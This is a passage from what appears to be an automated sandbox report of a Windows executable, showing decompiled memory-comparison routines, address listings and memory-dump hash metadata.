                  						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						goto L30;
                  					}
                  					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                  					if(_t349 == 0) {
                  						L19:
                  						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                  						if(_t351 == 0) {
                  							L21:
                  							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                  							if(_t353 == 0) {
                  								L23:
                  								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                  								if(_t309 != 0) {
                  									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  								}
                  								goto L26;
                  							}
                  							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L23;
                  						}
                  						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						goto L21;
                  					}
                  					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                  					if(_t309 != 0) {
                  						goto L1;
                  					}
                  					goto L19;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  					if(__esi == 0) {
                  						L8:
                  						__esi =  *(__eax - 0x1d) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  						if(__esi == 0) {
                  							L10:
                  							__esi =  *(__eax - 0x1c) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  							if(__esi == 0) {
                  								L12:
                  								__esi =  *(__eax - 0x1b) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L15;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L12;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L10;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L8;
                  				}
                  				L1:
                  				_t192 = _t309;
                  				goto L3;
                  			}
































                  0x00420ced
                  0x00420ced
                  0x00420cf3
                  0x00420d72
                  0x00420d74
                  0x00420d76
                  0x00000000
                  0x00000000
                  0x00420d7c
                  0x00420d82
                  0x00420e01
                  0x00420e03
                  0x00420e05
                  0x00000000
                  0x00000000
                  0x00420e0b
                  0x00420e11
                  0x00420e90
                  0x00420e92
                  0x00420e94
                  0x00000000
                  0x00000000
                  0x00420e9a
                  0x00420ea0
                  0x00420f1f
                  0x00420f21
                  0x00420f23
                  0x00000000
                  0x00000000
                  0x00420f29
                  0x00420f2f
                  0x00420fae
                  0x00420fb0
                  0x00420fb2
                  0x00000000
                  0x00000000
                  0x00420fbe
                  0x0042103e
                  0x00421040
                  0x00421042
                  0x00000000
                  0x00000000
                  0x00421048
                  0x0042104e
                  0x004210cd
                  0x004210cf
                  0x004210d1
                  0x00000000
                  0x00000000
                  0x004210df
                  0x004208d9
                  0x004208db
                  0x00421637
                  0x00421637
                  0x004210ed
                  0x004210ef
                  0x00420ccb
                  0x00420cd3
                  0x00420cd5
                  0x00420ce6
                  0x00420ce6
                  0x00000000
                  0x00420cd5
                  0x004210fc
                  0x00421102
                  0x0042151b
                  0x00000000
                  0x0042151b
                  0x00000000
                  0x00421108
                  0x00421057
                  0x00421059
                  0x00421070
                  0x00421078
                  0x0042107a
                  0x00421091
                  0x00421099
                  0x0042109b
                  0x004210b2
                  0x004210ba
                  0x004210bc
                  0x004210c9
                  0x004210c9
                  0x00000000
                  0x004210bc
                  0x004210a8
                  0x004210ac
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004210ac
                  0x00421087
                  0x0042108b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042108b
                  0x00421066
                  0x0042106a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042106a
                  0x00420fc8
                  0x00420fca
                  0x00420fe1
                  0x00420fe9
                  0x00420feb
                  0x00421002
                  0x0042100a
                  0x0042100c
                  0x00421023
                  0x0042102b
                  0x0042102d
                  0x0042103a
                  0x0042103a
                  0x00000000
                  0x0042102d
                  0x00421019
                  0x0042101d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042101d
                  0x00420ff8
                  0x00420ffc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420ffc
                  0x00420fd7
                  0x00420fdb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420fdb
                  0x00420f38
                  0x00420f3a
                  0x00420f51
                  0x00420f59
                  0x00420f5b
                  0x00420f72
                  0x00420f7a
                  0x00420f7c
                  0x00420f93
                  0x00420f9b
                  0x00420f9d
                  0x00420faa
                  0x00420faa
                  0x00000000
                  0x00420f9d
                  0x00420f89
                  0x00420f8d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420f8d
                  0x00420f68
                  0x00420f6c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420f6c
                  0x00420f47
                  0x00420f4b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420f4b
                  0x00420ea9
                  0x00420eab
                  0x00420ec2
                  0x00420eca
                  0x00420ecc
                  0x00420ee3
                  0x00420eeb
                  0x00420eed
                  0x00420f04
                  0x00420f0c
                  0x00420f0e
                  0x00420f1b
                  0x00420f1b
                  0x00000000
                  0x00420f0e
                  0x00420efa
                  0x00420efe
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420efe
                  0x00420ed9
                  0x00420edd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420edd
                  0x00420eb8
                  0x00420ebc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420ebc
                  0x00420e1a
                  0x00420e1c
                  0x00420e33
                  0x00420e3b
                  0x00420e3d
                  0x00420e54
                  0x00420e5c
                  0x00420e5e
                  0x00420e75
                  0x00420e7d
                  0x00420e7f
                  0x00420e8c
                  0x00420e8c
                  0x00000000
                  0x00420e7f
                  0x00420e6b
                  0x00420e6f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420e6f
                  0x00420e4a
                  0x00420e4e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420e4e
                  0x00420e29
                  0x00420e2d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420e2d
                  0x00420d8b
                  0x00420d8d
                  0x00420da4
                  0x00420dac
                  0x00420dae
                  0x00420dc5
                  0x00420dcd
                  0x00420dcf
                  0x00420de6
                  0x00420dee
                  0x00420df0
                  0x00420dfd
                  0x00420dfd
                  0x00000000
                  0x00420df0
                  0x00420ddc
                  0x00420de0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420de0
                  0x00420dbb
                  0x00420dbf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420dbf
                  0x00420d9a
                  0x00420d9e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420cf5
                  0x00420cf5
                  0x00420cf8
                  0x00420cfc
                  0x00420cfe
                  0x00420d15
                  0x00420d15
                  0x00420d19
                  0x00420d1d
                  0x00420d1f
                  0x00420d36
                  0x00420d36
                  0x00420d3a
                  0x00420d3e
                  0x00420d40
                  0x00420d57
                  0x00420d57
                  0x00420d5b
                  0x00420d5f
                  0x00420d61
                  0x00420d67
                  0x00420d6a
                  0x00420d6e
                  0x00420d6e
                  0x00000000
                  0x00420d61
                  0x00420d46
                  0x00420d49
                  0x00420d4d
                  0x00420d51
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420d51
                  0x00420d25
                  0x00420d28
                  0x00420d2c
                  0x00420d30
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420d30
                  0x00420d04
                  0x00420d07
                  0x00420d0b
                  0x00420d0f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420d0f
                  0x00420506
                  0x00420506
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction ID: 1ad419e0b28d6264509255d004894f3c4e1dcf1b6255f109f8943ce5774361dd
                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction Fuzzy Hash: 33D17D73E0A9B30A8735852D615823FEAE26FD164035FC7E2CCD03F38AD62A9C4196D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004208E1(void* __eax, void* __ecx) {
                  				void* _t183;
                  				signed int _t184;
                  				void* _t187;
                  				signed char _t193;
                  				signed char _t194;
                  				signed char _t195;
                  				signed char _t196;
                  				signed char _t198;
                  				signed int _t296;
                  				void* _t299;
                  				void* _t301;
                  				void* _t303;
                  				void* _t306;
                  				void* _t308;
                  				void* _t310;
                  				void* _t313;
                  				void* _t315;
                  				void* _t317;
                  				void* _t320;
                  				void* _t322;
                  				void* _t324;
                  				void* _t327;
                  				void* _t329;
                  				void* _t331;
                  				void* _t334;
                  				void* _t336;
                  				void* _t338;
                  
                  				_t187 = __ecx;
                  				_t183 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                  					_t296 = 0;
                  					L12:
                  					if(_t296 != 0) {
                  						goto L1;
                  					}
                  					_t193 =  *(_t183 - 0x19);
                  					if(_t193 ==  *(_t187 - 0x19)) {
                  						_t296 = 0;
                  						L23:
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						_t194 =  *(_t183 - 0x15);
                  						if(_t194 ==  *(_t187 - 0x15)) {
                  							_t296 = 0;
                  							L34:
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							_t195 =  *(_t183 - 0x11);
                  							if(_t195 ==  *(_t187 - 0x11)) {
                  								_t296 = 0;
                  								L45:
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								_t196 =  *(_t183 - 0xd);
                  								if(_t196 ==  *(_t187 - 0xd)) {
                  									_t296 = 0;
                  									L56:
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                  										_t296 = 0;
                  										L67:
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										_t198 =  *(_t183 - 5);
                  										if(_t198 ==  *(_t187 - 5)) {
                  											_t296 = 0;
                  											L78:
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                  											if(_t184 != 0) {
                  												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                  											}
                  											L2:
                  											return _t184;
                  										}
                  										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                  										if(_t299 == 0) {
                  											L71:
                  											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                  											if(_t301 == 0) {
                  												L73:
                  												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                  												if(_t303 == 0) {
                  													L75:
                  													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                  													if(_t296 != 0) {
                  														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  													}
                  													goto L78;
                  												}
                  												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                  												if(_t296 != 0) {
                  													goto L1;
                  												}
                  												goto L75;
                  											}
                  											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											goto L73;
                  										}
                  										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L71;
                  									}
                  									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                  									if(_t306 == 0) {
                  										L60:
                  										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                  										if(_t308 == 0) {
                  											L62:
                  											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                  											if(_t310 == 0) {
                  												L64:
                  												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                  												if(_t296 != 0) {
                  													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  												}
                  												goto L67;
                  											}
                  											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											goto L64;
                  										}
                  										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L62;
                  									}
                  									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L60;
                  								}
                  								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                  								if(_t313 == 0) {
                  									L49:
                  									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                  									if(_t315 == 0) {
                  										L51:
                  										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                  										if(_t317 == 0) {
                  											L53:
                  											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                  											if(_t296 != 0) {
                  												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  											}
                  											goto L56;
                  										}
                  										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L53;
                  									}
                  									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L51;
                  								}
                  								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L49;
                  							}
                  							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                  							if(_t320 == 0) {
                  								L38:
                  								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                  								if(_t322 == 0) {
                  									L40:
                  									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                  									if(_t324 == 0) {
                  										L42:
                  										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                  										if(_t296 != 0) {
                  											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  										}
                  										goto L45;
                  									}
                  									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L42;
                  								}
                  								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L40;
                  							}
                  							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L38;
                  						}
                  						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                  						if(_t327 == 0) {
                  							L27:
                  							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                  							if(_t329 == 0) {
                  								L29:
                  								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                  								if(_t331 == 0) {
                  									L31:
                  									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                  									if(_t296 != 0) {
                  										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  									}
                  									goto L34;
                  								}
                  								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L31;
                  							}
                  							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L29;
                  						}
                  						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						goto L27;
                  					}
                  					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                  					if(_t334 == 0) {
                  						L16:
                  						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                  						if(_t336 == 0) {
                  							L18:
                  							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                  							if(_t338 == 0) {
                  								L20:
                  								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                  								if(_t296 != 0) {
                  									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  								}
                  								goto L23;
                  							}
                  							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L20;
                  						}
                  						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						goto L18;
                  					}
                  					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                  					if(_t296 != 0) {
                  						goto L1;
                  					}
                  					goto L16;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  					if(__esi == 0) {
                  						L5:
                  						__esi =  *(__eax - 0x1c) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  						if(__esi == 0) {
                  							L7:
                  							__esi =  *(__eax - 0x1b) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  							if(__esi == 0) {
                  								L9:
                  								__esi =  *(__eax - 0x1a) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L12;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L9;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L7;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L5;
                  				}
                  				L1:
                  				_t184 = _t296;
                  				goto L2;
                  			}






























                  0x004208e1
                  0x004208e1
                  0x004208e7
                  0x00420966
                  0x00420968
                  0x0042096a
                  0x00000000
                  0x00000000
                  0x00420970
                  0x00420976
                  0x004209f5
                  0x004209f7
                  0x004209f9
                  0x00000000
                  0x00000000
                  0x004209ff
                  0x00420a05
                  0x00420a84
                  0x00420a86
                  0x00420a88
                  0x00000000
                  0x00000000
                  0x00420a8e
                  0x00420a94
                  0x00420b13
                  0x00420b15
                  0x00420b17
                  0x00000000
                  0x00000000
                  0x00420b1d
                  0x00420b23
                  0x00420ba2
                  0x00420ba4
                  0x00420ba6
                  0x00000000
                  0x00000000
                  0x00420bb2
                  0x00420c32
                  0x00420c34
                  0x00420c36
                  0x00000000
                  0x00000000
                  0x00420c3c
                  0x00420c42
                  0x00420cc1
                  0x00420cc3
                  0x00420cc5
                  0x00000000
                  0x00000000
                  0x00420cd3
                  0x00420cd5
                  0x00420ce6
                  0x00420ce6
                  0x004208db
                  0x00421637
                  0x00421637
                  0x00420c4b
                  0x00420c4d
                  0x00420c64
                  0x00420c6c
                  0x00420c6e
                  0x00420c85
                  0x00420c8d
                  0x00420c8f
                  0x00420ca6
                  0x00420cae
                  0x00420cb0
                  0x00420cbd
                  0x00420cbd
                  0x00000000
                  0x00420cb0
                  0x00420c9c
                  0x00420ca0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420ca0
                  0x00420c7b
                  0x00420c7f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420c7f
                  0x00420c5a
                  0x00420c5e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420c5e
                  0x00420bbc
                  0x00420bbe
                  0x00420bd5
                  0x00420bdd
                  0x00420bdf
                  0x00420bf6
                  0x00420bfe
                  0x00420c00
                  0x00420c17
                  0x00420c1f
                  0x00420c21
                  0x00420c2e
                  0x00420c2e
                  0x00000000
                  0x00420c21
                  0x00420c0d
                  0x00420c11
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420c11
                  0x00420bec
                  0x00420bf0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420bf0
                  0x00420bcb
                  0x00420bcf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420bcf
                  0x00420b2c
                  0x00420b2e
                  0x00420b45
                  0x00420b4d
                  0x00420b4f
                  0x00420b66
                  0x00420b6e
                  0x00420b70
                  0x00420b87
                  0x00420b8f
                  0x00420b91
                  0x00420b9e
                  0x00420b9e
                  0x00000000
                  0x00420b91
                  0x00420b7d
                  0x00420b81
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420b81
                  0x00420b5c
                  0x00420b60
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420b60
                  0x00420b3b
                  0x00420b3f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420b3f
                  0x00420a9d
                  0x00420a9f
                  0x00420ab6
                  0x00420abe
                  0x00420ac0
                  0x00420ad7
                  0x00420adf
                  0x00420ae1
                  0x00420af8
                  0x00420b00
                  0x00420b02
                  0x00420b0f
                  0x00420b0f
                  0x00000000
                  0x00420b02
                  0x00420aee
                  0x00420af2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420af2
                  0x00420acd
                  0x00420ad1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420ad1
                  0x00420aac
                  0x00420ab0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420ab0
                  0x00420a0e
                  0x00420a10
                  0x00420a27
                  0x00420a2f
                  0x00420a31
                  0x00420a48
                  0x00420a50
                  0x00420a52
                  0x00420a69
                  0x00420a71
                  0x00420a73
                  0x00420a80
                  0x00420a80
                  0x00000000
                  0x00420a73
                  0x00420a5f
                  0x00420a63
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420a63
                  0x00420a3e
                  0x00420a42
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420a42
                  0x00420a1d
                  0x00420a21
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420a21
                  0x0042097f
                  0x00420981
                  0x00420998
                  0x004209a0
                  0x004209a2
                  0x004209b9
                  0x004209c1
                  0x004209c3
                  0x004209da
                  0x004209e2
                  0x004209e4
                  0x004209f1
                  0x004209f1
                  0x00000000
                  0x004209e4
                  0x004209d0
                  0x004209d4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004209d4
                  0x004209af
                  0x004209b3
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004209b3
                  0x0042098e
                  0x00420992
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004208e9
                  0x004208e9
                  0x004208ec
                  0x004208f0
                  0x004208f2
                  0x00420909
                  0x00420909
                  0x0042090d
                  0x00420911
                  0x00420913
                  0x0042092a
                  0x0042092a
                  0x0042092e
                  0x00420932
                  0x00420934
                  0x0042094b
                  0x0042094b
                  0x0042094f
                  0x00420953
                  0x00420955
                  0x0042095b
                  0x0042095e
                  0x00420962
                  0x00420962
                  0x00000000
                  0x00420955
                  0x0042093a
                  0x0042093d
                  0x00420941
                  0x00420945
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420945
                  0x00420919
                  0x0042091c
                  0x00420920
                  0x00420924
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420924
                  0x004208f8
                  0x004208fb
                  0x004208ff
                  0x00420903
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420903
                  0x00420506
                  0x00420506
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction ID: 7798e54c5d41d41a509505e97969fc7ecc8be5c4d076ede3cbf0d1f7d5ebd489
                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction Fuzzy Hash: 37C17EB3E0A9B30A8736852D616812FEEE26FD175035EC7E2CCD43F38AD12A9D4185D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042050D(void* __eax, void* __ecx) {
                  				void* _t177;
                  				signed int _t178;
                  				void* _t181;
                  				signed char _t187;
                  				signed char _t188;
                  				signed char _t189;
                  				signed char _t191;
                  				signed char _t192;
                  				signed int _t198;
                  				signed int _t284;
                  				void* _t287;
                  				void* _t289;
                  				void* _t291;
                  				void* _t293;
                  				void* _t295;
                  				void* _t297;
                  				void* _t300;
                  				void* _t302;
                  				void* _t304;
                  				void* _t307;
                  				void* _t309;
                  				void* _t311;
                  				void* _t314;
                  				void* _t316;
                  				void* _t318;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  
                  				_t181 = __ecx;
                  				_t177 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                  					_t284 = 0;
                  					L11:
                  					if(_t284 != 0) {
                  						goto L1;
                  					}
                  					_t187 =  *(_t177 - 0x18);
                  					if(_t187 ==  *(_t181 - 0x18)) {
                  						_t284 = 0;
                  						L22:
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						_t188 =  *(_t177 - 0x14);
                  						if(_t188 ==  *(_t181 - 0x14)) {
                  							_t284 = 0;
                  							L33:
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							_t189 =  *(_t177 - 0x10);
                  							if(_t189 ==  *(_t181 - 0x10)) {
                  								_t284 = 0;
                  								L44:
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
